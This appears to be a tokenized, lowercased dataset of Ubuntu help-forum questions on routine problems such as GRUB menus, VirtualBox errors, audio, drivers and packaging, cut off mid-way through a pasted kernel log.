512418	windows is not in grub menu after trying to put password on	so i put a password on my menu entries followed this how to password protect grub menu entry ? guide exactly and now i do n't see windows 7 in grub on a reboot the ubuntu installation is password protected though i went to try and change the 330_os-prober line back and the -- users is n't there im assuming it has something to do with the config file that was generated ? so i think something happened to the menu entry but anyway does anyone know if you can boot windows at grub command prompt ? i dont want to get rid of either ubuntu but restore the mbr with a disc or windows update : so i went in removed -- users from the line in 30_os-probe ran sudo update-grub and windows 7 appeared and im prompted to user and password to boot ubuntu or windows 7 im very confused i thought adding & removing the -- users part in 30_os-probe was the part that makes a user & password requirement
512420	virtual box not starting in trusty thar , i get the following error	i could run virtualbox on ubuntu 12.04 with no problems , after updating to trusty , when i attempted to run virtualbox i got the following error , tried reinstalling but i get the same error . here is the error message : failed to create the virtualbox com object . the application will now terminate . start tag expected , ' < ' not found . location : '/home/chiku/.virtualbox/virtualbox.xml ' , line 1 ( 0 ) , column 1 . /build/buildd/virtualbox-4.3.10-dfsg/src/vbox/main/src-server/virtualboximpl.cpp [ 531 ] ( nsresult virtualbox : :init ( ) ) .
512422	how do i get ok google to work on google chrome and be always on ?	version 37.0.2062.76 beta ( 64-bit ) installed , ca n't get ok google to turn on . i 've done google searches on how to get this to work but nothing seems to be working for me . does anyone have this working or do you remember how you got this working ?
512424	my computer is broken after recent update attempt to 14.04	so it all started on a day much like today , because it is today but that 's not the point , when i got a notification telling me i have n't upgraded to 14.04 . not due to lack of trying , however . it offered to upgrade me itself . now keep in mind , i 've tried very hard to upgrade my is from 12.04 to 14.04 . many times , i believe , due to tinkering where there should n't be tinkering , my bios are messed up . so upgrading is essentially impossible , but i was n't about to stop it from updating for me , thinking it did n't have too much to do with bios as it does n't reboot until after . so i let it go about its business and some time later i look back at it , and my unity sidebar is gone , and anytime there 's text on screen it shows as those box things . the real bottom line is that i want to know my options . all of them . i would love to be able to keep the stuff on my hard drive so a hard drive swap may be an option if you guys say that would work . i just need my computer back . let me know if i left anything out . peace ! b^ )
512426	why does the ubuntu sdk tell me , `` do not use comma expression '' , and what should i use instead ?	so for example : oncurrentlyexpandedchanged : flickable.dragoverbounds , flickable.contentheight += itemheight , console.log ( itemheight ) the commas will have a yellow underline , and the tooltip will tell me to not use comma expressions . what expression should i use instead ? what expressions can i use ?
512429	status of dependencies upon update	i 'm currently running 12.04.5 , the 64 bit version . now , i have a few projects and for them i have a number of dependencies installed . i 'm thinking of an upgrade to 14.04 , but i 'm worried about the installed dependencies . are they upgraded too ? would i have to install them again ?
512430	usb keyboard & mouse stopped working ( ubuntu 14 lts )	i 've been using ubuntu 14 lts on my work desktop , laptop , and home desktop without any problems . does anyone know what i can do ? what works : keyboard on boot keyboard in bios keyboard/mouse on livecd grub selection menu keyboard/mouse works on other os's what does n't work : login screen keyboard and mouse symptoms : stopped working for no apparent reason . ( possibly the built in software-updater changed something ) internet message pops up saying can not connect to internet ( not sure why , works on livecd ) blinking cursor on input field stops blinking after a few seconds . tried : unplugging keyboard + mouse ( both are using usb 2.0 ) made sure bios has legacy usb support on tried different usb ports browsing sites for a solution for a few hours , i can not find a clear answer . i have linux recovery options with several header versions , i have not tried using an older one . however , i am trying to repair the most current .
512432	fully scan and clean broken installations in ubuntu 12.04	i have gone through the dist usage utility in ubuntu and i deleted some folders here and there in my desktop and also in my downloads . these included some software packages i had installed earlier ... ... . i am not very sure whether all the installation points related to these softwares have been cleaned after i have deleted the folders in the desktop . windows ofcourse we have an uninstall utility . but since i dint know a similar way in ubuntu i just deleted the folders . is here any command that i can run now to fully scan and remove softwares and packages that have not been properly installed or uninstalled ? ? ?
512433	can not access ppa ppa : langdalepl/gvfs-mtp on ubuntu 14.04	i followed the recommendations in the following q & a to get my phone to work with ubuntu : how to connect nokia lumia 520 to ubuntu 12.04 unfortunately the installation failed for me . when updating i get the following error : w : failed to fetch http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how can i get this ppa to work ? is there any other method to access the files and folders on my phone ?
512434	how to download ubuntu version 12.04 lts direct download	how can i download the ubuntu version of 12.04 lts ? please give me the direct link . i tried searching but all search results ends at 14.04.1 lts download . which i do n't want now ( will download later ) kindly do the needful . thank you .
512442	alt+f4 stops working after compiz restart . how to fix ?	observation : if i hit alt+f2 and enter compiz -- replace , then the shorcut key alt+f4 for closing windows stops working . i am using the latest version of gnome-ubuntu ( 14.04 ) . question : is there a way to restore the hotkey functionality ? or is there another way to restart compiz without losing the hotkey functionality ? also tell me , if this is a bug , then i 'll try to report it ! also sometimes ctrl+ctrl/c/v stop working , but it seems to happen for a different reason which i have not found out yet . therefore it would be nice to know how to restore/relaunch the keyboard functionality in general . unfortunately i have to restart compiz this way sometimes , because occasionally my mouse clicks will stop working ( for whatever reason , but this is a different story ) , and the solution other people with the same problem have found is to restart compiz .
512444	keyboard layout changes to english after each reboot	recently i upgraded my ubuntu to 14.04 and now my keyboard layout changes to `` english ( us ) '' each time i reboot , even though in the top right of my screen `` german ( swiss ) '' is selected as the active keyboard . my list of selected keyboards shows `` german ( swiss ) '' , `` russian '' , `` greek '' and `` english ( us ) '' , in this order , where `` german ( swiss ) '' should be the default setting . does anyone know how this problem can be fixed ?
512445	wifi repeater creation	i need to make my pc act as wifi repeater . it is possible in windows using netsh commands or connectify software http : //www.wikihow.com/create-a-wifi-hotspot-using-the-command-prompt is there any such software or command available for ubuntu/linux ?
512447	launch file manager from terminal with a keyboard shortcut	i would like to use a keyboard shortcut to launch the file manager in the working directory of the terminal ( the reverse equivalent of keyboard shortcut for `` open a terminal here '' ) . how can i achieve this ?
512449	can i install ubuntu 14.04lts alongside windows vista ?	will ubuntu 14 work alongside windows vista ( on a pc ) , or do i need to choose ubuntu 13 or 12 instead ?
512454	how to you get a flickable to do a smooth scroll ?	flickable { button { onclicked : parent. ? ? ? ? ? ? ? ? ? } or do i have to create a function for this ?
512457	can not enter ubuntu graphical environment after update	i was using ubuntu 12.04 lts version and everything was working fine . yesterday i decided to update using the option in the update manager to ubuntu 14 . everything went smoothly in the installation but after the restart when i tried to boot ubuntu i was stuck in a grey/white screen ( no login possible ) ... please tell me that there is a solution in this that does not require complete format of the operating system ! i am not proficient in using ubuntu so please if you make any suggestion like check graphic card do tell me how to do it or redirect me to an adequate tutorial ...
512458	gimp memory increasing problem	i have a problem with gimp in ubuntu 14.04 . when starting gimp it works perfectly at first , but as soon as i copy a selection of pixels value in `` system monitoring > resources > memory and swap history > memory '' ( hope those terms are correct , had to translate them ) starts to increase and it does n't stop until the memory reaches values bigger than 95 % , which dramatically decreases the performance of my operating system . after closing gimp the memory value suddenly decreases to some value below 30 % . something else i realized : as soon as the memory starts to increase , the cursor in gimp changes to a busy cursor ( or hourglass cursor or whatever it is called ) for a very short period of time and this cursor change happens approximately once each second . i assume that gimp is saving something each second , even though i do n't actively save anything . i also assume that it has something to do with the clipboard since if i execute `` xsel -bc '' in a terminal , the memory increase stops ( but does not reduce to its initial value ) . help would very much be appreciated !
512461	how do i install ntfs-3g ( ntfsprogs ) manually on ubuntu ?	recently i wanted to fix one of my sata hard disks that had a damaged ntfs file system . for this , i referred to this question : ubuntu 13.04 is unable to mount a disk drive from ex-windows system in which a tool called ntfsprogs is installed in ubuntu . as i did not encounter the package ntfsprogs on the ubuntu software center even after running sudo apt-get update , how can i get it ?
512462	jailkit freezing	i 'm trying to jail ssh users on my ubuntu 14.04 server . so after installing jailkit version 2.17 ( with the help of this tutorial ) i 'm now trying to follow this askubuntu answer to use jailkit . after running the first jailkit command however , it shows a couple lines of output and then seems to stop doing anything : $ sudo jk_init -v jail basicshell source file ( s ) /lib/libnsl.so.1 do not exist source file ( s ) /lib64/libnsl.so.1 do not exist source file ( s ) /lib/libnss*.so.2 do not exist source file ( s ) /lib64/libnss*.so.2 do not exist source file ( s ) /lib/i386-linux-gnu/libnsl.so.1 do not exist source file ( s ) /lib/i386-linux-gnu/libnss*.so.2 do not exist create directory jail/lib create directory jail/lib/x86_64-linux-gnu i first thought it simply takes a while , but was hanging for more than half an hour . i ctrl+c it , and tried again , but with the same result . does anybody know what i 'm doing wrong ? all tips are welcome !
512463	highly distorted sound on stereo but headphone gives perfect output	i am struggling with the audio output of my laptop that 's running 12.04 lts . it was all fine till yesterday . i played the spotify in the web player and abruptly the sound just reduced and i couldnt hear anything on the stereo . on the other hand , when i connect the headphone , the sound is just perfect . i have the following configuration : - hp probook 6450b , codec : idt 92hd75b3x5 codec : lsi id 1040 codec : intel ibexpeak hdmi
512465	how to obtain list of copied files in nautilus	imagine i copied several files in nautilus to paste them somewhere else ; how could i obtain the list of copied filenames to for example , use it in a script ?
512466	crc error when trying to open archive with gzip/tar	when i run the command tar xvf ns-allinone-2.28.tar.gz it gives the following error : ns-allinone-2.28/tclcl-1.16/tkappinit.cc gzip : stdin : invalid compressed data -- crc error tar : child returned status 1 tar : exiting with failure status due to previous errors
512467	how can i put a package on ubuntu repositories ?	i create a simple charset converter by qt which can use to subtitle correction or any missing encoding . i published it in github by gnu license ( see here ) . now , i want to put this program on ubuntu and other linux distribution repositories . can you help me to do this ? ! i made a debian package ( amd64 ) that you can test it by downloading from here .
512470	i 'm considering buying sound bar with bluetooth for my home theatre , can i pair my ubuntu 14.04 system with the speakers ?	i 'm currently investigating purchasing this sony ht-ct60bt 2.1 channel surround soundbar and subwoofer with bluetooth/nfc function . it seems a good purchase to go with my tv . however , i 'm really excited about the idea of have a speaker system with bluetooth . i 'm hoping i could stream spotify from my 14.04 laptop to these speakers by bluetooth . is this possible with ubuntu ?
512471	trouble with freshly installed texstudio on ubuntu 14.04 lts	from scratch ( after having removed texlive and texmaker from the console ) , i installed texstudio with optional add-ons latex-beamer texlive-fonts-recommended texlive-latex-extra for this , i used ubuntu software center ( with the add-ons ticked ) . i then took a document which worked perfectly with my old texmaker ( on ubuntu 12xx ) process started : pdflatex -synctex=1 -interaction=nonstopmode `` ic_v5_ghed3 '' .tex kpathsea : running mktexfmt pdflatex.fmt process exited with error ( s ) probably a path is missing ... i do n't know . can somebody help ? thanks in advance
512472	hardcoding subtitles using mkvmerge recursivly	i have 24 season 9 , the folder has episodes and arabic subtitles . i want to automate the hardcoding of the subtitles subtitles using a script . it looks like so 24.903.hdtv-lol.mp4 and 24.903.hdtv-lol_ar.srt so far , i 've been doing it manually using mkvmerge-gui , i select charset : ara ( arabic ) , encoding windows-1256 destination : newfolder/s9e3.mkv how to automate all that ? so it will look for the subtitles corresponding to the episode , hardcode it using the options given above ?
512473	ubuntu 14.01 gives internal errors , system update crashes	ubuntu keeps on giving me internal errors , when i boot the system up it gives several internal errors , and when i try to update or install a program , the updater and the software center shut down . http : //imgur.com/a/ag9lc these are the outputs i get when i give the command sudo apt-get update . could anyone help me with this problem ?
512474	installer freezes at starting udev log	i 'm trying to install ( also tried to boot as livecd , to no avail , the very same thing happens ) ubuntu 14.04 on an old computer of mine ( i 'm not sure how old it is exactly , but may well be over 10 years ) . i downloaded the latest version , ran the installer and unfortunately got the `` freezing dots '' problem . i disabled splash screen and tried again , and it turns out that it freezes at the following line : * starting udev save log and update rules [ ok ] yes , it does actually say [ ok ] , but then nothing happens . the cd drive stops spinning and the installer just hangs there . i 've also tried the latest version of lubuntu and got the very same results . as i said , this is very old hardware . any suggestions ?
512475	kernel update plans for ubuntu	is there a site where we can see which kernels we will most likely be getting with upcoming ubuntu releases ? i 'm personally thinking if i should install the 3.13.7.x kernel manually or waiting to get it via update . a site where i can see planned releases would help a lot best
512481	usb wifi digitus dn-70440 does n't work on ubuntu 14.04 64bit	i have a wifi dongle digitus dn-70440 that can not be recognized by ubuntu . i have tried to compile drivers from source but always receive an error during compiling ... : ( in terminal lsusb command , gives me bus 003 device 004 : id 148f:7601 ralink technology , corp . i receive these errors during make clean and make commands . this is the wifi adapter
512482	hdmi audio not working on tv	i am trying to connect my 64 bit ubuntu 14.04 dell inspiron laptop to my sony lcd tv with hdmi . the video works , but the audio does not . it continues to give audio from the laptop , not from the tv . there is no problem with my tv as it used to work with another dell laptop with windows 7 . if i go to system settings - > sound in ubuntu , the hdmi device is not listed under output . but aplay -l command does list out hdmi sound cards : faizal @ faizal-inspiron-3537 : ~ $ aplay -l **** list of playback hardware devices **** card 0 : hdmi [ hda intel hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc283 analog [ alc283 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 here is what all i have tried to resolve : based on http : //askubuntu.com/a/117773/279330 , i tried : speaker-test -c 2 -r 48000 -d hw:0,3 the test was successfull and the hdmi is now listed in sound settings . but the audio still does not output from the tv . then i try the instructions at https : //wiki.ubuntu.com/audio/upgradingalsa/dkms i.e . i install dkms , download the alsa package and then run sudo dpkg -i < filename > . but i get the error during install : selecting previously unselected package oem-audio-hda-daily-dkms . ( reading database ... 360224 files and directories currently installed . ) preparing to unpack oem-audio-hda-daily-dkms_0.201408161316~ubuntu14.04.1_all.deb ... unpacking oem-audio-hda-daily-dkms ( 0.201408161316~ubuntu14.04.1 ) ... dpkg : dependency problems prevent configuration of oem-audio-hda-daily-dkms : oem-audio-hda-daily-dkms depends on dkms ( > = 1.95 ) ; however : package dkms is not installed . dpkg : error processing package oem-audio-hda-daily-dkms ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : oem-audio-hda-daily-dkms can i try something to fix this ?
512484	ubuntu freezes and never launched again	my problem is while i surfing on internet ubuntu freezes . i ca n't get any response . even num-lock is not working . then i press power button 5 sec and restart ubuntu . it does n't launch . screen stays in closed mode . it does not even get a signal . my workaround is plug out bios battery and plug it in motherboard again . now i can use my computer normally . but what is the problem ? how can i solve it ? 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 00:01.0 pci bridge : intel corporation 82g33/g31/p35/p31 express pci express root port ( rev 10 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 01:00.0 vga compatible controller : nvidia corporation g98 [ geforce g 100 ] ( rev a1 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 01 ) my vga info : 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation g98 [ geforce g 100 ] [ 10de:06e6 ] ( rev a1 ) subsystem : nvidia corporation g98 [ geforce g 100 ] [ 10de:06e6 ] kernel driver in use : nvidia
512485	change notes plasmoid background	is there any way to change the notes plasmoid background ? i tried looking for the plasmoid in /usr/share/kde4/apps/plasma/plasmoids/ and ~/.kde/share/apps/plasma/plasmoids/ to change it myself ( if it 's not binary of some uneditable sort ) but could not find the widget at all . also if there 's another notes plasmoid which is more customizeable , i 'd appreciate it if you told me . right now i 'm going through the kde-look.org site plasmoids section page by page , but have n't found a hit so far . thanks
512492	why does my wireless card appears in iwconfig as a eth interface ?	i wanted to identify my wireless network interface name to check my wireless network card is installed properly or not . but i am getting something different . i 'm used to seeing this : $ /sbin/iwconfig wlan0 ieee 802.11 mode : monitor frequency:2.437 ghz tx-power=20 dbm but i am now seeing this : $ /sbin/iwconfig eth0 no wireless extensions . eth1 ieee 802.11abg essid : '' repalle '' mode : managed frequency:2.462 ghz access point : c0 : a0 : bb:17:12:6e retry long limit:7 rts thr : off fragment thr : off power management : on lo no wireless extensions . why is my wireless card showing up as an eth interface instead of a wifi or wlan interface , and how can i make it appear as i expect ?
512494	javascript hangs chrome and firefox	ubuntu 14.04 : chrome and firefox hang when javascript is enabled . this problem is mentioned many times but no real solution found . tried re-setting firefox and re-creating profile .
512496	garbled log-in screen	there are similar questions , but all suggested questions refer to after log-in problems or refer to earlier releases . i upgraded to 14.04 as suggested in the update process . it 's the log-in screen that is messed up big-time , not post log-in . i discovered that clicking in the middle of the screen and then typing my password gets me to the normal unity running fine . i can live with this situation , but the garbled log-in screen could be a bug.i 'm running an amd phenom ( tm ) 8450e triple-core processor x3 , gallium graphics.gallium 0.4 on ati rs740 . is my desktop too old for 14.04 ?
512497	how i can make debian source package form my program which write by qt ?	i made a program by qt and i want to put it on ubuntu software center form myapps.developer.ubuntu.com . when i want to submit it , i should upload debian source package . how i make this ? ! you can see source of my program here .
512498	how can i lock seahorse gnupg keys ?	since not long ago i 've started to use seahorse to manage my encryption keys , and at the moment i 'm finding myself a bit baffled about what it appears quite a security hole of the system ... in fact , despite it provides the possibility to lock the folders where it has stored all the administrator 's passwords , it does n't have the same feature for locking the gnupg folder . as a result , any hypothetical attacker ( let 's say for example an hacker ) can easily access the `` properties '' of any pgp keyring , and from there export the secret key in a text format without even go through any password whatsoever . on the other hand , it 's true that he would still need to know the associated passphrase to decrypt with the acquired certificate , but how can we be sure that there 's not a software that just allows to do it with the secret key solely ? and what 's the point to store the secret key in a safe place then ? am i missing something ? is there a way to make seahorse ask for a password before exporting my private key ? i 'd be sorry to turn down a nice piece of software like this one just for that .
512499	youtube looks broken , shows messed-up screen ( see picture )	i just installed the latest xubuntu . you tube looks broke like in the picture : having problems with other features on other sites . is this a frame rate issue ?
512503	how can i see and close active software manager processes ?	i use the lubuntu 14.04 version on my eeepc netbook . to install skype , i downloaded the package and i 'm using the `` installatore applicazioni '' ( in english , `` package installer '' i guess ) . before starting the installation , it says '' only one software management tool is allowed to run at the same time . please close the other application ( e.g . update manager , aptitude , or synaptic ) first . '' how can i close the update manager ( or one of the others ) ? and , in general , how can i know which processes are active and how to close them ? i mean , the analogous for the windows ctrl-alt-canc in lubuntu ( if it ever exists ) ? thanks .
512504	private internet access ( vpn ) on ubuntu 12.04	has anyone used exede internet service ( isp ) with private internet access ( vpn ) or any other vpn . i 'm in rural ok area thinking of using exede but they want 2 yr contract . you mention vpn and they think you are blackbeard . they say most vpn 's do n't work , wo n't tell you which ones do . i presently have installed xp , win7 , ubuntu 14.04 & 12.04 which i use 99 % of time , until i get 14.04 completely setup . any help is appreciated .
512506	weird behaviour	i am using the ubuntu 12.04 precise pangolin , from past few days i am observing a strange behaviour with my ubuntu server . let me give you a brief introduction to my server . installed softwares and packages open geo suite consists geoserver , postgresql arcsde plugin jar files . tomcat6 and apache 2.4.7 server hardware is : ram - 16 gb hard disk size -300 gb cpu cores : 8 some times i loose my configuration settings and when i restart my server every thing will be again in normal position . i am unable to find the problem is whether from geoserver , postgresql , ubuntu or from network side .
512507	usb seen as a removable drive	i am using software ( ezscan ) that looks for the scanner that is attached via usb . it automatically looks for it as a removable drive/port as e : but ubuntu 14.04 sees it as a a local drive . therefore the ezscan does not see it . if i click on the usb icon i see all the folders on the scanner so ubuntu is seeing it . is there a way for ubuntu to see my scanner attached by usb as a removable drive ?
512511	unable to boot windows 7 and 8 after installing ubuntu 14.04	i have installed ubuntu 14.04 triple boot . i already had windows 7 and 8 before installing ubuntu . now i am unable to boot either of them . on startup ubuntu is getting started directly without any triple boot option . what should i do to open either of the two windows ? can anyone help me with this ?
512513	atl1c module uses 100 % cpu , kernel 3.13.0-34	i have just upgraded my 3 mythbuntu systems to 14.04.1 . on one of the systems , i have an atheros ar8131 ethernet controller . on this system , one of the cpu cores is constantly at 100 % usage ( kworker ) . i did cpu back traces and found it was being used by the module atl1c ( atheros driver , supplied by qualcomm ) . i tried both the 32 bit version and the 64 bit version with the same results . i have since rolled back to 12.04.5 ( which does not exhibit the issue ) . $ lspci | grep 8131 03:00.0 ethernet controller : qualcomm atheros ar8131 gigabit ethernet ( rev c0 ) mythbuntu 12.04.5 ( x86 ) : $ uname -a linux myth-231 3.2.0-60-generic-pae # 91-ubuntu smp wed feb 19 04:14:56 utc 2014 i686 i686 i386 gnu/linux $ modinfo atl1c filename : /lib/modules/3.2.0-60-generic-pae/kernel/drivers/net/ethernet/atheros/atl1c/atl1c.ko version : 1.0.1.0-napi license : gpl description : atheros 1000m ethernet network driver author : jie yang < jie.yang @ atheros.com > srcversion : 994f608d5e92045e005aaea alias : pci : v00001969d00001083sv*sd*bc*sc*i* alias : pci : v00001969d00001073sv*sd*bc*sc*i* alias : pci : v00001969d00002062sv*sd*bc*sc*i* alias : pci : v00001969d00002060sv*sd*bc*sc*i* alias : pci : v00001969d00001062sv*sd*bc*sc*i* alias : pci : v00001969d00001063sv*sd*bc*sc*i* depends : intree : y vermagic : 3.2.0-60-generic-pae smp mod_unload modversions 686 mythbuntu 14.04.1 ( x64 ) : $ uname -a linux myth-231 3.13.0-34-generic # 60-ubuntu smp wed aug 13 15:45:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ modinfo atl1c filename : /lib/modules/3.13.0-34-generic/kernel/drivers/net/ethernet/atheros/atl1c/atl1c.ko version : 1.0.1.1-napi license : gpl description : qualcom atheros 100/1000m ethernet network driver author : qualcomm atheros inc. , < nic-devel @ qualcomm.com > author : jie yang srcversion : 77a3fab53265a7c9aca8a49 alias : pci : v00001969d00001083sv*sd*bc*sc*i* alias : pci : v00001969d00001073sv*sd*bc*sc*i* alias : pci : v00001969d00002062sv*sd*bc*sc*i* alias : pci : v00001969d00002060sv*sd*bc*sc*i* alias : pci : v00001969d00001062sv*sd*bc*sc*i* alias : pci : v00001969d00001063sv*sd*bc*sc*i* depends : intree : y vermagic : 3.13.0-34-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 50:0b : c5 : c8:7d:4b:11:5c : f3 : c1:50:4f:7a:92 : e2:33 : c6:14:3d:58 sig_hashalgo : sha512 should i stay on mythbuntu 12.04 , or upgrade to 14.04 ( what i want to do ) . how can i roll back the atl1c module , or fix the new module ? thanks in advance .
512514	change ownership of external drive	i just bought a new sata disk that i 've now formated into ext4 using gparted . when i ran gparted , i ran it as root . now , i ca n't write files to the drive because i 'm not the owner of the drive . the drive has a folder called lost+found . i 'm primary going to store virtual machines on the drive . now my question is the following ; what is the best way ( most secure ? ) to make me the owner of the drive without `` destroying '' the permissions on the drive ( i 'm thinking of the lost+found folder ) . thanks in advance !
512519	network manager icon disapear 14.04	after installing hostapd in ubuntu 14.04 . network manager icon disapears . even after removing hostapd , still network manager icon is not appearing . during boot up , `` waiting up to 60 seconds to start network configuration '' and after that another message `` booting up without network configuration '' how can i resolve this issue ? best regards , sukhdeep singh
512520	how to install driver with .tar format in ubuntu 14.04	i have just installed ubuntu 14.04 ( trusty tahr ) on my hp probook 445 g1 . and i want to install the drivers for audio , webcam , wifi adapter and many more things . my laptop has realtek 802.11 b/g/n wifi adapter and ralink 802.11 b/g/n bluetooth adapter . i have downloaded the drivers but they are in .tar format and i do n't know how to install them . i have searched the internet and i found a solution using the terminal but did n't understood it . please provide me the solution to install the drivers ( in .tar format ) in ubuntu 14.04 whether it be by using the terminal or anything else . thanks in advance .
512523	drop connection if upload speed exceed specific value	i have a media server installed to my ubuntu machine . i want to limit ( really limit ) incoming data to my server per connection for uploads and if specific bandwidth exceed , their connection will be dropped . for example , when clients are streaming to my server ; if they are exceeding the upload speed value ( kbp/s ) specified from me , i want to drop their connections . i looked to tc , trickle , wondershaper vs. but they are not dropping to connections . is there any program for this purpose or any advice or configure to those programs to achieve that ?
512524	mounting usb disks automatically	i run lubuntu 14.04 ( without a display manager ) . when i connect a usb disk it is not automatically mounted and it does n't show up in the file manager pcmanfm . what daemon do i need to run to enable automatic mounting of usb disks ?
512525	how to enable 24bit true color support in gnome terminal ?	according to this page , gnome terminal supports 24bit true color . this is consistent with wikipedia . when i run color-spaces.pl in ubuntu 14.04 lts with gnome terminal 3.6.2 , the result is the following : while there is no reference image , i imagine that those green strangely-shaped objects at the bottom indicate that the terminal is unable to print 24bit colors correctly . how to enable 24bit support ?
512527	how can i find the reason ubuntu crashed	as the title , which log file i should pay attention ? i do n't use x ( use ubuntu in text mode ) , i have python program which use much memmory . when the system break . the ssh ca n't connnect , keyboard and monitor also do n't response . after restart , no kernel crash file in /var/crash . /var/log/kern.log do n't have some useful message . there is one line [ 2241.261714 ] ext4-fs error ( device sdb1 ) : ext4_mb_g enerate_buddy:756 : group 6072 , 1629 clusters in bitmap , 1624 in gd ; block bitmap corrupt . but this is not the time it freeze , because there are messages in kern.log at the same moment.so the questions may not to solve the problem , may be the first is how can i find all the message when it freeze . which file should i pay attention . if it can re happened , what i should do before it crash , ( some method to make system log more ) , excepte memory test , is there anthoer handware problem can check ? i think i should give up ask the general quetsion , in my syslog there so many log like this aug 17 22:25:13 engine- mtp-probe : bus : 2 , device : 101 was not an mtp device aug 17 22:26:07 engine- kernel : [ 12238.560872 ] usb 2-1.3 : usb disconnect , device number 101 aug 17 22:26:08 engine- kernel : [ 12240.041751 ] usb 2-1.3 : new low-speed usb device number 102 using ehci-pci aug 17 22:26:08 engine- kernel : [ 12240.138035 ] usb 2-1.3 : new usb device found , idvendor=046d , idproduct=c077 aug 17 22:26:08 engine- kernel : [ 12240.138037 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 aug 17 22:26:08 engine- kernel : [ 12240.138039 ] usb 2-1.3 : product : usb optical mouse aug 17 22:26:08 engine- kernel : [ 12240.138040 ] usb 2-1.3 : manufacturer : logitech aug 17 22:26:08 engine- kernel : [ 12240.140164 ] input : logitech usb optical mouse as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/input/input235 aug 17 22:26:08 engine- kernel : [ 12240.140321 ] hid-generic 0003:046d : c077.00e0 : input , hidraw0 : usb hid v1.11 mouse [ logitech usb optical mouse ] on usb-0000:00:1d.0-1.3/input0 aug 17 22:26:08 engine- mtp-probe : checking bus 2 , device 102 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3 '' aug 17 22:26:08 engine- mtp-probe : bus : 2 , device : 102 was not an mtp device aug 17 22:27:02 engine- kernel : [ 12293.623914 ] usb 2-1.3 : usb disconnect , device number 102 aug 17 22:27:03 engine- kernel : [ 12295.104785 ] usb 2-1.3 : new low-speed usb device number 103 using ehci-pci aug 17 22:27:03 engine- kernel : [ 12295.201075 ] usb 2-1.3 : new usb device found , idvendor=046d , idproduct=c077 aug 17 22:27:03 engine- kernel : [ 12295.201078 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 aug 17 22:27:03 engine- kernel : [ 12295.201079 ] usb 2-1.3 : product : usb optical mouse this is strange after the system reboot it do n't need always check the usb module ? and i do n't touch the machine ( like insert a usb or plug the usb ) . after remove libmtp , and change usb port still have endless message like aug 18 09:28:32 engine- kernel : [ 2005.845393 ] usb 1-1.1 : usb disconnect , device number 6 aug 18 09:28:34 engine- kernel : [ 2007.324639 ] usb 1-1.1 : new low-speed usb device number 7 using ehci-pci aug 18 09:28:34 engine- kernel : [ 2007.421178 ] usb 1-1.1 : new usb device found , idvendor=046d , idproduct=c077 aug 18 09:28:34 engine- kernel : [ 2007.421180 ] usb 1-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 aug 18 09:28:34 engine- kernel : [ 2007.421181 ] usb 1-1.1 : product : usb optical mouse aug 18 09:28:34 engine- kernel : [ 2007.421182 ] usb 1-1.1 : manufacturer : logitech aug 18 09:28:34 engine- kernel : [ 2007.423287 ] input : logitech usb optical mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/input/input35 aug 18 09:28:34 engine- kernel : [ 2007.423521 ] hid-generic 0003:046d : c077.0018 : input , hidraw0 : usb hid v1.11 mouse [ logitech usb optical mouse ] on usb-0000:00:1a.0-1.1/input0 aug 18 09:29:27 engine- kernel : [ 2060.908432 ] usb 1-1.1 : usb disconnect , device number 7 aug 18 09:29:29 engine- kernel : [ 2062.387676 ] usb 1-1.1 : new low-speed usb device number 8 using ehci-pci aug 18 09:29:29 engine- kernel : [ 2062.484091 ] usb 1-1.1 : new usb device found , idvendor=046d , idproduct=c077 aug 18 09:29:29 engine- kernel : [ 2062.484093 ] usb 1-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 aug 18 09:29:29 engine- kernel : [ 2062.484094 ] usb 1-1.1 : product : usb optical mouse aug 18 09:29:29 engine- kernel : [ 2062.484095 ] usb 1-1.1 : manufacturer : logitech aug 18 09:29:29 engine- kernel : [ 2062.486085 ] input : logitech usb optical mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/input/input36 aug 18 09:29:29 engine- kernel : [ 2062.486339 